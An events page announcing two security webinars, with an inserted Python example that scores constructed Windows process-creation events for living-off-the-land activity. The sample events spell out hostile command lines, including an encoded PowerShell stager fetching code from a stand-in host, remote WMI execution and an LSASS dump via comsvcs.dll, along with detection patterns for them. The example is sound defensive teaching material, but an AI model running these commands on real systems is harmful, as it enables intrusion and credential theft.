Endpoint Security

Events

  • Living-Off-the-Land Attacks Dwell for Months. Here’s Why Your Detection Stack Keeps Missing Them.

    Living-off-the-land (LOTL) attacks do not drop malware, install backdoors, or trigger signature-based detections. They use the tools already present in your environment: PowerShell, WMI, legitimate remote administration utilities, and valid credentials. Nation-state groups and sophisticated criminal operators favor this approach because it blends seamlessly with normal administrative activity. Some LOTL intrusions dwell for months or even years before discovery.

    Most detection stacks were built to find things that should not be there. LOTL attacks invert the problem by using things that should be there. As a result, organizations are being forced to rethink how detection, identity, and behavioral signals work together across the stack to distinguish legitimate activity from attacker behavior.

    Addressing LOTL techniques requires coordination across endpoint, network, identity, and behavioral analytics capabilities – from EDR and XDR to ITDR, NDR, UEBA, and deception technologies.

    Topics include:

    • How LOTL attackers exploit native tools and legitimate credentials to evade detection
    • Why signature-based and file-based detection strategies fail against fileless techniques
    • Building a detection posture around behavioral analysis, credential monitoring, and assumed compromise

    Discover how to close the detection gaps that LOTL attackers are counting on and build defenses designed for threats that look like normal operations.
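The detection posture the session describes, as an added example that is not drawn from the event or its presenters: a small Python scorer run over five constructed process-creation events (Sysmon Event ID 1 / Security 4688 style, not real telemetry). A stand-in file-reputation check passes every event, because each image is a signed Windows binary; the behavioural rules (parent/child anomaly, decoded -EncodedCommand content, remote WMI process creation, discovery commands, LSASS dumping via comsvcs.dll) carry illustrative weights chosen for this example, not a vendor's detection content, and the hosts, users and the 203.0.113.5 stager URL are made up.

```python
"""Behavioural scoring of process-creation events for living-off-the-land activity.

Added example: constructed Sysmon-EID-1 / Security-4688-style events (not real
telemetry) and illustrative scoring rules (not a vendor's detection content).
"""
import base64
import ntpath
import re
from typing import Dict, List, Optional, Tuple

# Plaintext of the encoded stager in event 2 (constructed; 203.0.113.5 is a TEST-NET-3 address).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/stage1.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events. Only event 1 is routine administration.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-114", "user": r"CORP\jdoe", "parent": "explorer.exe", "image": PS,
     "cmdline": "powershell.exe -NoProfile Get-Service -Name Spooler"},
    {"id": 2, "host": "WS-114", "user": r"CORP\jdoe", "parent": "WINWORD.EXE", "image": PS,
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED}"},
    {"id": 3, "host": "SRV-DB01", "user": r"CORP\svc_backup", "parent": "wmiprvse.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "net user /domain > C:\Windows\Temp\u.txt"'},
    {"id": 4, "host": "WS-114", "user": r"CORP\jdoe", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:SRV-FS02 process call create "cmd.exe /c whoami > \\WS-114\c$\out.txt"'},
    {"id": 5, "host": "SRV-DB01", "user": r"CORP\svc_backup", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\l.dmp full"},
]

# Every image above is a signed Windows binary, which is exactly why file reputation says nothing.
SIGNED_OS_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wmic.exe", "rundll32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Office apps spawning a shell (macro/phish) and the WMI provider host spawning one (remote WMI exec).
ODD_SHELL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "wmiprvse.exe"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_EXEC = re.compile(r"(?i)iex|invoke-expression|downloadstring|net\.webclient|invoke-webrequest")
DISCOVERY = re.compile(r"\bnet1?\s+(?:user|group|localgroup)\b|\bnltest\b|\bwhoami\b|\bquser\b")


def signature_verdicts(events: List[dict]) -> Dict[int, str]:
    """Stand-in for a hash/signature engine: known-good OS binaries simply pass."""
    return {ev["id"]: ("allowlisted" if ntpath.basename(ev["image"]).lower() in SIGNED_OS_BINARIES
                       else "unknown") for ev in events}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE text) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict) -> Tuple[int, List[str]]:
    """Weighted behavioural indicators; none of them depend on the file itself being malicious."""
    image = ntpath.basename(ev["image"]).lower()
    parent = ev["parent"].lower()
    low = ev["cmdline"].lower()
    hits: List[Tuple[str, int]] = []
    if image in SHELLS and parent in ODD_SHELL_PARENTS:
        hits.append((f"shell spawned by {parent}", 3))
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None:
        hits.append(("encoded PowerShell command line", 2))
        if DOWNLOAD_EXEC.search(decoded):
            hits.append(("decoded payload downloads and executes code", 3))
    if re.search(r"-w(?:indowstyle)?\s+hidden", low):
        hits.append(("hidden window", 1))
    if re.search(r"-nop(?:rofile)?\b", low):
        hits.append(("profile suppressed", 1))  # weak on its own: admins use it too
    if re.search(r"-e(?:p|xecutionpolicy)\s+bypass", low):
        hits.append(("execution policy bypass", 1))
    if image == "wmic.exe" and "/node:" in low and "process call create" in low:
        hits.append(("remote process creation over WMI", 3))
    if DISCOVERY.search(low):
        hits.append(("account/host discovery command", 2))
    if image == "rundll32.exe" and "comsvcs.dll" in low and "minidump" in low:
        hits.append(("LSASS memory dump via comsvcs.dll MiniDump", 4))
    return sum(w for _, w in hits), [f"{label} (+{w})" for label, w in hits]


def detect(events: List[dict], threshold: int = 4) -> List[dict]:
    """Emit one alert per event whose behavioural score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"id": ev["id"], "host": ev["host"], "user": ev["user"],
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print("file reputation:", signature_verdicts(SAMPLE_EVENTS))  # every event passes
    for a in detect(SAMPLE_EVENTS):
        print(f"event {a['id']} {a['host']} {a['user']} score={a['score']}: {'; '.join(a['reasons'])}")
```

Run stand-alone, the reputation check allowlists all five events while the behavioural scorer alerts on events 2 to 5; event 1 picks up a single weak point for -NoProfile and stays below the threshold, which is the reason to aggregate weighted signals rather than alert on any one of them. The identity layer the session pairs with this (credential monitoring, ITDR) would add a further dimension not shown here, for example correlating the svc_backup account's WMI-spawned shell on SRV-DB01 with the logon type and source host that produced it.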

  • Nation-state Tactics in Criminal Hands: What the Blurring of Threat Actor Lines Means for Your Defenses

    The line separating nation-state operations from criminal activity is collapsing. Criminal groups are adopting techniques that were once the exclusive domain of state-sponsored actors: supply chain compromise, living-off-the-land intrusions, pre-positioning inside critical infrastructure, and coordinated campaigns timed to geopolitical events. At the same time, nation-states are outsourcing operations to criminal proxies, creating a blended threat landscape where attribution is harder and the sophistication floor keeps rising. What once required a government-backed team and years of development is now available as a service on dark web forums.

    For defenders, this convergence changes the calculus. Threat models built around the assumption that criminal actors use commodity tools and state actors use custom capabilities no longer hold. Addressing this requires coordination across threat intelligence, detection and response platforms, and security analytics capabilities to build defenses that account for sophisticated adversaries regardless of attribution. That means threat intelligence that tracks actor behavior rather than just indicators of compromise, detection strategies calibrated for advanced tradecraft at any scale, and incident response plans that prepare for the possibility that a ransomware attack is the visible layer of a deeper intrusion.

    Topics include:

    • How the convergence of criminal and nation-state tactics is reshaping the threat landscape
    • Moving threat intelligence from indicator-based feeds to behavior-based analysis
    • Building detection and response capabilities calibrated for sophisticated adversaries at any scale

    Explore what the blurring of threat actor lines means for your security strategy and how to defend against adversaries who no longer fit neatly into categories.
